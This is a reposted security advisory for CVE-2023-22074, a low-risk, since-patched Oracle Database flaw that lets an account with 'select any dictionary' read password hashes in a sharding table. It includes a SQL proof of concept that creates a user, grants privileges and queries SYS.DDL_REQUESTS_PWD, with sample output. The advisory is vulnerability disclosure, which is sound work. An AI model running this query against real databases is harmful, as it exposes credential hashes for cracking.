Share
## https://sploitus.com/exploit?id=PACKETSTORM:175352
Title: CVE-2023-22074 โ€“ Oracle database password hash exposure in sharding component  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11]  
Tested Version(s): 19c  
Risk Level: Low  
Solution Status: Fixed  
CVE Reference: CVE-2023-22074  
Base Score: 2.4   
Author of Advisory: Emad Al-Mousa  
  
  
*****************************************  
Vulnerability Details:  
  
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.  
  
  
*****************************************  
Proof of Concept (PoC):  
  
I will create an account called โ€œjimโ€ in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:  
  
SQL> alter session set container=ORCLPDB1;  
  
Session altered.  
  
SQL> create user jim identified by jim123;  
  
User created.  
  
SQL> grant create session,select any dictionary to jim;  
  
Grant succeeded.  
  
I will now connect using database account โ€œjimโ€ and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:  
  
sqlplus "jim/jim123"@ORCLPDB1  
  
SQL> show user  
USER is "JIM"  
SQL> select * from SYS.DDL_REQUESTS_PWD;  
  
DDL_NUM PWD_BEGIN  
---------- ----------  
ENC_PWD  
--------------------------------------------------------------------------------  
123 445  
E494684108560FFEF1C17CDE72F36A1A  
  
  
  
  
*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2023.html  
https://nvd.nist.gov/vuln/detail/CVE-2023-22074  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22074  
https://databasesecurityninja.wordpress.com/2023/10/25/cve-2023-22074-oracle-database-password-hash-exposure-in-sharding-component/  
https://github.com/emad-almousa/CVE-2023-22074